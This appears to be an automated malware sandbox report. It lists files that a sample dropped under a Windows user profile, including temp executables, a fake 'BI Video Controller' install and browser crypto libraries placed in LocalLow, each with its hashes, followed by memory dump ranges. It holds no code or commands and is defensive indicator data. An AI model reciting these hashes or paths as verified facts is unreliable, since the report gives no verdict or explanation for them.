6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
af897f0138fa23043827b44649246e80

SHA1
79d6bd80ae48f14aedb2a706dd049640747f0266

SHA256
24c1daef218e3296064a43e41f167023d2fae48ac19022f992b03eb67f7af9b9

SHA512
395c4f2362268b69c4bba8516215ba8eaeb658b33658672fc08147e7cb0a1d6a8fd63bbbf44d8fe0d2af65e0fa1b5787fc907a07ac5315c0064422e4bfddb305

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1d187728e3216c2190eefae089b6f266

SHA1
8281c1ddd7e70a83b768458f8a41fb326298ed06

SHA256
7db6ea90b9774b3b81b5b9db869852b63f6d5cc095e27f21fb8a50b15e1cf27e

SHA512
5429043014ba77877af2e603b890916f8f443be7c7b9b06c05cef2faed3fd449bcc3f39df514f2dd7bf93be9235f7a9d79019ad00fd1ef75e3fba6c5b84a62c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\837E.exe
MD5
e987477b0d14b6d7075f0105aa28ba92

SHA1
54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

SHA256
4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

SHA512
bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

Download Submit
C:\Users\Admin\AppData\Local\Temp\837E.exe
MD5
e987477b0d14b6d7075f0105aa28ba92

SHA1
54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

SHA256
4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

SHA512
bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

Download Submit
C:\Users\Admin\AppData\Local\Temp\837E.exe
MD5
e987477b0d14b6d7075f0105aa28ba92

SHA1
54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

SHA256
4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

SHA512
bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

Download Submit
C:\Users\Admin\AppData\Local\Temp\8CD5.exe
MD5
49f58a80993170b4351014d0b5068897

SHA1
7af2615ec10821cbefb55c602b270c27fa1d6806

SHA256
905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c

SHA512
2ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\8CD5.exe
MD5
49f58a80993170b4351014d0b5068897

SHA1
7af2615ec10821cbefb55c602b270c27fa1d6806

SHA256
905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c

SHA512
2ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\914B.exe
MD5
2c488e751cc8d933035d0f5dc398d6ef

SHA1
3e9253b08dc561926aaacc85ddb5db7e30665100

SHA256
ec17b8acb8f6608995dcff248faf23b5d972511e88319bec1be4ecf48e20b75a

SHA512
173b856c1283767e4604bfe06fba9410891173c07d8478553e2a2a972e61d668d3c922592085a2d1af47e8fe4a105caaaf197685382a317d30d307fdb46e75cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\914B.exe
MD5
2c488e751cc8d933035d0f5dc398d6ef

SHA1
3e9253b08dc561926aaacc85ddb5db7e30665100

SHA256
ec17b8acb8f6608995dcff248faf23b5d972511e88319bec1be4ecf48e20b75a

SHA512
173b856c1283767e4604bfe06fba9410891173c07d8478553e2a2a972e61d668d3c922592085a2d1af47e8fe4a105caaaf197685382a317d30d307fdb46e75cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\9738.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\9738.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\9738.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
C:\Users\Admin\AppData\Local\Temp\9B8E.exe
MD5
4fb208ec7d17d1ba04dd724693231c5e

SHA1
d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5

SHA256
6dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449

SHA512
172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\9B8E.exe
MD5
4fb208ec7d17d1ba04dd724693231c5e

SHA1
d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5

SHA256
6dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449

SHA512
172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\9E9C.exe
MD5
b9a734ea84f2d88b6be300332ccc3543

SHA1
59d8534b8a2e0148a9fca945f10428a82424e475

SHA256
881583cc1f60373ad9cacb46a0cf431a710ce5b6d573fcb7109f70dd8781e77c

SHA512
38fbe208a9003c189f3f01c419f576a3908a58b426d24e8d38ee2af990a131fd29501163776b55d619220a5c3e871c6532fdc90face782195ec1c5c874b502af

Download Submit
C:\Users\Admin\AppData\Local\Temp\9E9C.exe
MD5
b9a734ea84f2d88b6be300332ccc3543

SHA1
59d8534b8a2e0148a9fca945f10428a82424e475

SHA256
881583cc1f60373ad9cacb46a0cf431a710ce5b6d573fcb7109f70dd8781e77c

SHA512
38fbe208a9003c189f3f01c419f576a3908a58b426d24e8d38ee2af990a131fd29501163776b55d619220a5c3e871c6532fdc90face782195ec1c5c874b502af

Download Submit
C:\Users\Admin\AppData\Local\Temp\A63E.exe
MD5
d3ddcff47d32b16b82d53a1d45ba26bd

SHA1
8d2be1dafd57b82ddf709971b590c762436205bc

SHA256
f83f5f862a96201504c3f06966d12b26e71403477537d41b575b939bba02aa76

SHA512
2e53ffb2c666480605d9a17a8752a0035d25a41cde5f3ba59a4cd394539b85ad3ed39bf0ba7ee075f743d3df6f474b2537e6dccd973fe780461a76b75ffb29ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\A63E.exe
MD5
d3ddcff47d32b16b82d53a1d45ba26bd

SHA1
8d2be1dafd57b82ddf709971b590c762436205bc

SHA256
f83f5f862a96201504c3f06966d12b26e71403477537d41b575b939bba02aa76

SHA512
2e53ffb2c666480605d9a17a8752a0035d25a41cde5f3ba59a4cd394539b85ad3ed39bf0ba7ee075f743d3df6f474b2537e6dccd973fe780461a76b75ffb29ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\AB50.exe
MD5
5e81a2efc2cf1a3d249f1c6ac067e418

SHA1
11cfa7970fb7e192ddd66f589923fb45adf1535b

SHA256
43bce5eab3179fbb052497ed23fb1ff9615b692e88b63413a30eb45b81e2ee6c

SHA512
9cbf1df33de1b7e3788c9656c2dc9002a2d78a0ed9610e59e129cb0d2c0b367251ee4b04aa238e8c9d914ced94e21d41915307953489976cb5e9e04cd4bc293b

Download Submit
C:\Users\Admin\AppData\Local\Temp\AB50.exe
MD5
5e81a2efc2cf1a3d249f1c6ac067e418

SHA1
11cfa7970fb7e192ddd66f589923fb45adf1535b

SHA256
43bce5eab3179fbb052497ed23fb1ff9615b692e88b63413a30eb45b81e2ee6c

SHA512
9cbf1df33de1b7e3788c9656c2dc9002a2d78a0ed9610e59e129cb0d2c0b367251ee4b04aa238e8c9d914ced94e21d41915307953489976cb5e9e04cd4bc293b

Download Submit
C:\Users\Admin\AppData\Local\Temp\AB50.exe
MD5
5e81a2efc2cf1a3d249f1c6ac067e418

SHA1
11cfa7970fb7e192ddd66f589923fb45adf1535b

SHA256
43bce5eab3179fbb052497ed23fb1ff9615b692e88b63413a30eb45b81e2ee6c

SHA512
9cbf1df33de1b7e3788c9656c2dc9002a2d78a0ed9610e59e129cb0d2c0b367251ee4b04aa238e8c9d914ced94e21d41915307953489976cb5e9e04cd4bc293b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-EK51K.tmp\837E.tmp
MD5
6da8ef761a1ac640f74c4509a3da8b47

SHA1
de626da008e5e8500388ec7827bcd1158f703d98

SHA256
232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5

SHA512
c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-F2UJQ.tmp\837E.tmp
MD5
6da8ef761a1ac640f74c4509a3da8b47

SHA1
de626da008e5e8500388ec7827bcd1158f703d98

SHA256
232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5

SHA512
c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
MD5
cf8114289d40ec83b53463b1ac8930c9

SHA1
00036a509bc31c4264a0414d3386f420854ca047

SHA256
39b7e686bb324ecf81adc0b6a165830cd4d3f7d8a2bbba310930fa023f95bb12

SHA512
e19af0dcf1aa8253523a1eba1c69f5f26cc63730ef630c60c4ce46d368b037753110426c7e3db333041046dbb04ccffec2bfd48529e1cdaab6547e331df02fc9

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
MD5
cf8114289d40ec83b53463b1ac8930c9

SHA1
00036a509bc31c4264a0414d3386f420854ca047

SHA256
39b7e686bb324ecf81adc0b6a165830cd4d3f7d8a2bbba310930fa023f95bb12

SHA512
e19af0dcf1aa8253523a1eba1c69f5f26cc63730ef630c60c4ce46d368b037753110426c7e3db333041046dbb04ccffec2bfd48529e1cdaab6547e331df02fc9

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\libfreetype-4.dll
MD5
96f1c8a9c83fbf6411f35d3de8fdc77c

SHA1
41b590133df449c8e0ce247aab7def7cfc39399d

SHA256
ae8db0fc9690c6047bd1d1aeb7cd254060c0623700bb184ce3f1b3d1daffc39e

SHA512
fa214f15b7c77eca2760aa2489debc5d7244f5535a7b725b49ae7f9ba6f5341a04ee2ccabe15f1e70a542582ed64758d1b4e2d61faaacf2a56e3ec750df76baa

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_021606.txt
MD5
6e8186cd563a9e60bd99776c9f2c6ef0

SHA1
80aaa27baef5d6090d0328c60ae7e07450864c4c

SHA256
90698e56fc4accb43cc7e5fa900739807bedf8e880b785b9389e86c9ad008ac5

SHA512
984720325cab9814e46ca72c2a855a4137f1912dbd161b8aec26461e3af7ebfefb89b56d7b8b1246aa6a1b153eedb7df33b59ca501c0258c87e622519ee7255f

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_021607.txt
MD5
10ac7515592002c789cba3d3343cda5f

SHA1
9f63182e1222c4f1108219a4ed7691882d817a00

SHA256
3dca34d18e513a103fd151dae1e1403de7da6c04a3011594367e8b36895d3742

SHA512
269135947299ce2c1369857f916573096d6609a2b5c2a5c89ed22c908dd23c8894d05a98c4079978500414ef137901bd735b0a0b07501749474bc002baa58fd4

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_021608.txt
MD5
76ed051fe309230da8755ac72f5cf9a6

SHA1
4c0d8c80032fe806e86e0ca962d3c3d735746067

SHA256
dc1bbba8a8598697133a62b1fa20dd91e9f77e50cea84f15d25100a3ead58813

SHA512
796c9ed71d2720ab7317c2419a37f013f9a963510ef1242be9650e43952e0b4ae33844791e833731400ef28815bf3a0fd0bba6ad93a6e7f7c1092891b5296949

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_021610.txt
MD5
b289f54f8aefaa2573003f6c8e9e1b6d

SHA1
d9665e00bcc699486452f13119260dd7526bc1aa

SHA256
5260ce91a02bfc855e226f731d2fc16eff4bb6240b50d572ecead9dfbf594bb5

SHA512
f8b99430a7d38df56f882c9b43ccc511c27fee3208637f4e8a0b348d4f50e71821a76aabb334e071857697e4bca69a83947f8b0b6046278066487cae0cc16df5

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_021612.txt
MD5
12061bac72b1211954ca6c2404a85597

SHA1
b84551748e48c54703cad5e9e38ab0e49a7f6dc3

SHA256
61461e6eba1be06cbdc3468332b706e3990802d31dd62118a627fbd273b83e8c

SHA512
e0ada8060c69d79f05d5d5cd6e82ddbb883825eed35a7861bc7968e74f87e4be712495edabef0387ac371fea4605e3eb61cf17f6525cf2a1e274c47f32fedb6c

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_021614.txt
MD5
b4d7d864e1c982158976235a2db5e104

SHA1
5afe6c648bcc6e1507da1bceffe2395ccad44e9f

SHA256
86e7111a7918f87eccacb527bdd79824703499835e0a394d84e73b5020c1102d

SHA512
e891aaf296b01ddc677f2029763b1c66031408bd996a767a57f432db122d0efce800c79ae51b11d265ebe17836e85c1880335d1c9e35ce1275547cf98253e89c

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_021615.txt
MD5
3adf46dd5eca6c21c35de51488f30525

SHA1
37f3dbdd2bbb0a6fe04f3ab0021903bb047347ea

SHA256
b6cf41705a1a1ca34d57e5f4045b2b14ffd48408f00b04ce62bffbfc67f473af

SHA512
3950063ae17163f8106b44d8d234199d70eb1a6bc1e5873b9ecbbbbeab2c47395c3e3398f0a25558760608a114a0b5141b6b7d6c1c02b729b032d959a7e8651e

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_021616.txt
MD5
89ae155b1b04604af555f57cbc52c154

SHA1
338e0d3de66ecd88ec1edc9b7857eb616fd7e88a

SHA256
235b59f3019cc489c5581b719dd7027c249cb842f6edfc7069760a37e20a0f8f

SHA512
8518ddb140eca2ac830ff799b00d14f7ea82241faf9e6128bd15eb42657a122c0fdcde610157a6b59238d35fba5725d174f6b5d73d7370b66d42922e0cd0f424

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210812_021618.txt
MD5
9eeff025fec25ef529a3df416a8f38d5

SHA1
7d571de5adcb96ac9c40b57370ef0d268d7e7e79

SHA256
cb40f6a57a56741df55cbd922151e2f4740ca47650f0b2df480ef9dca57749c5

SHA512
f8e80cd6220670927da812031d0a47ba7fce68c622e7c5097496d3ee2b29b4b4b31d7b9bcb54044fdc7eac0f2e4a01bc4b742095d55d5061f9b2cdea9d18c1f2

Download Submit
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\menu.xml
MD5
0ad63807522a2fc76deff4eddbc77d35

SHA1
85ba4baf1b1a623bc8fe5ea9334088de8da390c7

SHA256
f04362f73243736c636a08982e1f3655ce5824f2e5b0e3e87acbd94d0a906b96

SHA512
5cacea66310d6f8fc41cc742d6570e389e9df0f9faec4af2c8d036635500bfcf605148ec0a6e8d54b64485abb8a3881f00e7c93bbe7ab35eec85f39c6c33dac9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BI Video Controller for x86 systems\BI Video Controller for x86 systems.lnk
MD5
68ede6c7bf10f7874d61c6175bae18eb

SHA1
6da28c27d0c302e4afd8fbe3c70fead2f7be5caf

SHA256
443b69c78c570f318d1ae8c210ae6c0ab3dbc6e02b2246c0853c2bf95c3afb89

SHA512
12333865b15152918d848f91b7ddb18ee7d0fbe39f2c4100a82a141c3c83243efd08b04ffea718f081a088478bb82b0875326e6d9510896fbf1a791a789a2741

Download Submit
\??\c:\users\admin\appdata\local\temp\is-ek51k.tmp\837e.tmp
MD5
6da8ef761a1ac640f74c4509a3da8b47

SHA1
de626da008e5e8500388ec7827bcd1158f703d98

SHA256
232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5

SHA512
c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\freebl3.dll
MD5
60acd24430204ad2dc7f148b8cfe9bdc

SHA1
989f377b9117d7cb21cbe92a4117f88f9c7693d9

SHA256
9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

SHA512
626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\mozglue.dll
MD5
eae9273f8cdcf9321c6c37c244773139

SHA1
8378e2a2f3635574c106eea8419b5eb00b8489b0

SHA256
a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

SHA512
06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\nss3.dll
MD5
02cc7b8ee30056d5912de54f1bdfc219

SHA1
a6923da95705fb81e368ae48f93d28522ef552fb

SHA256
1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

SHA512
0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

Download Submit
\Users\Admin\AppData\LocalLow\nW6mI-7yS1k\softokn3.dll
MD5
4e8df049f3459fa94ab6ad387f3561ac

SHA1
06ed392bc29ad9d5fc05ee254c2625fd65925114

SHA256
25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

SHA512
3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\libfreetype-4.dll
MD5
96f1c8a9c83fbf6411f35d3de8fdc77c

SHA1
41b590133df449c8e0ce247aab7def7cfc39399d

SHA256
ae8db0fc9690c6047bd1d1aeb7cd254060c0623700bb184ce3f1b3d1daffc39e

SHA512
fa214f15b7c77eca2760aa2489debc5d7244f5535a7b725b49ae7f9ba6f5341a04ee2ccabe15f1e70a542582ed64758d1b4e2d61faaacf2a56e3ec750df76baa

Download Submit
memory/788-664-0x0000000000000000-mapping.dmp

Download
memory/940-206-0x0000000000E60000-0x0000000000ECB000-memory.dmp

Filesize
428KB

Download
memory/940-204-0x0000000003350000-0x00000000033C4000-memory.dmp

Filesize
464KB

Download
memory/940-194-0x0000000000000000-mapping.dmp

Download
memory/1104-645-0x0000000000000000-mapping.dmp

Download
memory/1480-662-0x0000000000000000-mapping.dmp

Download
memory/1584-151-0x0000000000400000-0x0000000000919000-memory.dmp

Filesize
5.1MB

Download
memory/1584-150-0x00000000009F0000-0x0000000000A2B000-memory.dmp

Filesize
236KB

Download
memory/1584-135-0x0000000000000000-mapping.dmp

Download
memory/1588-251-0x00000000070F0000-0x00000000070F1000-memory.dmp

Filesize
4KB

Download
memory/1588-250-0x00000000069F0000-0x00000000069F1000-memory.dmp

Filesize
4KB

Download
memory/1588-202-0x0000000005480000-0x0000000005A86000-memory.dmp

Filesize
6.0MB

Download
memory/1588-178-0x0000000000000000-mapping.dmp

Download
memory/1588-182-0x0000000000CF0000-0x0000000000CF1000-memory.dmp

Filesize
4KB

Download
memory/1792-153-0x0000000000000000-mapping.dmp

Download
memory/1796-223-0x0000000000800000-0x000000000080B000-memory.dmp

Filesize
44KB

Download
memory/1796-219-0x0000000000000000-mapping.dmp

Download
memory/1796-221-0x0000000000810000-0x0000000000817000-memory.dmp

Filesize
28KB

Download
memory/1832-156-0x0000000000000000-mapping.dmp

Download
memory/1832-183-0x0000000000400000-0x0000000000919000-memory.dmp

Filesize
5.1MB

Download
memory/1856-669-0x0000000000000000-mapping.dmp

Download
memory/1876-639-0x0000000000000000-mapping.dmp

Download
memory/2276-605-0x0000000000000000-mapping.dmp

Download
memory/2284-650-0x000001F9F0D60000-0x000001F9F0D80000-memory.dmp

Filesize
128KB

Download
memory/2284-649-0x000001F9F0D40000-0x000001F9F0D60000-memory.dmp

Filesize
128KB

Download
memory/2284-609-0x000001F9F0D20000-0x000001F9F0D40000-memory.dmp

Filesize
128KB

Download
memory/2284-596-0x00007FFAC9410000-0x00007FFAC9412000-memory.dmp

Filesize
8KB

Download
memory/2284-577-0x0000000000000000-mapping.dmp

Download
memory/2288-660-0x0000000000000000-mapping.dmp

Download
memory/2336-137-0x00000000007B0000-0x00000000007B1000-memory.dmp

Filesize
4KB

Download
memory/2336-133-0x0000000000000000-mapping.dmp

Download
memory/2380-643-0x0000000000000000-mapping.dmp

Download
memory/2496-115-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2496-116-0x0000000000402E1A-mapping.dmp

Download
memory/2544-146-0x00000000001B0000-0x00000000001B1000-memory.dmp

Filesize
4KB

Download
memory/2544-142-0x0000000000000000-mapping.dmp

Download
memory/2544-173-0x0000000004B50000-0x0000000004B51000-memory.dmp

Filesize
4KB

Download
memory/2544-169-0x0000000004AF0000-0x0000000004FEE000-memory.dmp

Filesize
5.0MB

Download
memory/2544-163-0x0000000004B90000-0x0000000004B91000-memory.dmp

Filesize
4KB

Download
memory/2544-149-0x0000000004FF0000-0x0000000004FF1000-memory.dmp

Filesize
4KB

Download
memory/2636-565-0x0000000000000000-mapping.dmp

Download
memory/2716-168-0x0000000000000000-mapping.dmp

Download
memory/2716-200-0x0000000000950000-0x0000000000A9A000-memory.dmp

Filesize
1.3MB

Download
memory/2716-201-0x0000000000400000-0x0000000000946000-memory.dmp

Filesize
5.3MB

Download
memory/2720-233-0x0000000008490000-0x0000000008491000-memory.dmp

Filesize
4KB

Download
memory/2720-218-0x0000000007CC0000-0x0000000007CC1000-memory.dmp

Filesize
4KB

Download
memory/2720-224-0x00000000070D0000-0x00000000070D1000-memory.dmp

Filesize
4KB

Download
memory/2720-247-0x00000000091E0000-0x00000000091E1000-memory.dmp

Filesize
4KB

Download
memory/2720-248-0x0000000009260000-0x0000000009261000-memory.dmp

Filesize
4KB

Download
memory/2720-193-0x0000000000000000-mapping.dmp

Download
memory/2720-209-0x00000000075E0000-0x00000000075E1000-memory.dmp

Filesize
4KB

Download
memory/2720-212-0x0000000004C22000-0x0000000004C23000-memory.dmp

Filesize
4KB

Download
memory/2720-208-0x00000000049E0000-0x00000000049E1000-memory.dmp

Filesize
4KB

Download
memory/2720-257-0x0000000004C23000-0x0000000004C24000-memory.dmp

Filesize
4KB

Download
memory/2720-215-0x0000000007480000-0x0000000007481000-memory.dmp

Filesize
4KB

Download
memory/2720-211-0x0000000004C20000-0x0000000004C21000-memory.dmp

Filesize
4KB

Download
memory/2720-246-0x00000000092D0000-0x00000000092D1000-memory.dmp

Filesize
4KB

Download
memory/2720-217-0x0000000007520000-0x0000000007521000-memory.dmp

Filesize
4KB

Download
memory/2720-220-0x0000000007D30000-0x0000000007D31000-memory.dmp

Filesize
4KB

Download
memory/2988-125-0x00000000009E0000-0x00000000009E1000-memory.dmp

Filesize
4KB

Download
memory/2988-123-0x0000000000000000-mapping.dmp

Download
memory/3016-557-0x0000000000000000-mapping.dmp

Download
memory/3020-203-0x00000000026B0000-0x0000000002742000-memory.dmp

Filesize
584KB

Download
memory/3020-188-0x0000000000000000-mapping.dmp

Download
memory/3020-192-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/3024-117-0x0000000000C60000-0x0000000000C76000-memory.dmp

Filesize
88KB

Download
memory/3156-641-0x0000000000000000-mapping.dmp

Download
memory/3196-578-0x0000000000000000-mapping.dmp

Download
memory/3288-585-0x0000000002FF0000-0x000000000308C000-memory.dmp

Filesize
624KB

Download
memory/3288-568-0x0000000000000000-mapping.dmp

Download
memory/3288-128-0x0000000000000000-mapping.dmp

Download
memory/3288-136-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/3628-114-0x0000000000030000-0x000000000003A000-memory.dmp

Filesize
40KB

Download
memory/3644-177-0x0000000000400000-0x0000000002CB1000-memory.dmp

Filesize
40.7MB

Download
memory/3644-160-0x0000000000000000-mapping.dmp

Download
memory/3644-176-0x0000000002CC0000-0x0000000002E0A000-memory.dmp

Filesize
1.3MB

Download
memory/3668-122-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/3668-118-0x0000000000000000-mapping.dmp

Download
memory/3760-174-0x0000000002DF0000-0x0000000002DF1000-memory.dmp

Filesize
4KB

Download
memory/3760-167-0x0000000002EB0000-0x0000000002EB1000-memory.dmp

Filesize
4KB

Download
memory/3760-179-0x0000000005250000-0x0000000005251000-memory.dmp

Filesize
4KB

Download
memory/3760-126-0x0000000000000000-mapping.dmp

Download
memory/3760-141-0x0000000076E80000-0x000000007700E000-memory.dmp

Filesize
1.6MB

Download
memory/3760-145-0x0000000000C30000-0x0000000000C31000-memory.dmp

Filesize
4KB

Download
memory/3760-152-0x0000000005750000-0x0000000005751000-memory.dmp

Filesize
4KB

Download
memory/3760-171-0x0000000002E60000-0x0000000002E61000-memory.dmp

Filesize
4KB

Download
memory/3760-166-0x0000000000C00000-0x0000000000C01000-memory.dmp

Filesize
4KB

Download
memory/3832-210-0x0000000000000000-mapping.dmp

Download
memory/3832-213-0x00000000001D0000-0x00000000001D7000-memory.dmp

Filesize
28KB

Download
memory/3832-216-0x00000000001C0000-0x00000000001CC000-memory.dmp

Filesize
48KB

Download
memory/3884-230-0x0000000000D90000-0x0000000000D99000-memory.dmp

Filesize
36KB

Download
memory/3884-222-0x0000000000000000-mapping.dmp

Download
memory/3884-232-0x0000000000D80000-0x0000000000D8F000-memory.dmp

Filesize
60KB

Download
memory/4116-702-0x0000000004BD0000-0x00000000050CE000-memory.dmp

Filesize
5.0MB

Download
memory/4140-653-0x0000000000000000-mapping.dmp

Download
memory/4160-235-0x0000000000A30000-0x0000000000A35000-memory.dmp

Filesize
20KB

Download
memory/4160-231-0x0000000000000000-mapping.dmp

Download
memory/4160-236-0x0000000000A20000-0x0000000000A29000-memory.dmp

Filesize
36KB

Download
memory/4192-238-0x0000000000EC0000-0x0000000000ECC000-memory.dmp

Filesize
48KB

Download
memory/4192-234-0x0000000000000000-mapping.dmp

Download
memory/4192-237-0x0000000000ED0000-0x0000000000ED6000-memory.dmp

Filesize
24KB

Download
memory/4212-651-0x0000000000000000-mapping.dmp

Download
memory/4232-561-0x0000000000000000-mapping.dmp

Download
memory/4248-243-0x0000000000430000-0x0000000000439000-memory.dmp

Filesize
36KB

Download
memory/4248-242-0x0000000000440000-0x0000000000444000-memory.dmp

Filesize
16KB

Download
memory/4248-241-0x0000000000000000-mapping.dmp

Download
memory/4272-588-0x0000000000000000-mapping.dmp

Download
memory/4332-592-0x0000000000000000-mapping.dmp

Download
memory/4336-259-0x0000000000D20000-0x0000000000D29000-memory.dmp

Filesize
36KB

Download
memory/4336-255-0x0000000000000000-mapping.dmp

Download
memory/4336-258-0x0000000000D30000-0x0000000000D35000-memory.dmp

Filesize
20KB

Download
memory/4352-256-0x0000000000000000-mapping.dmp

Download
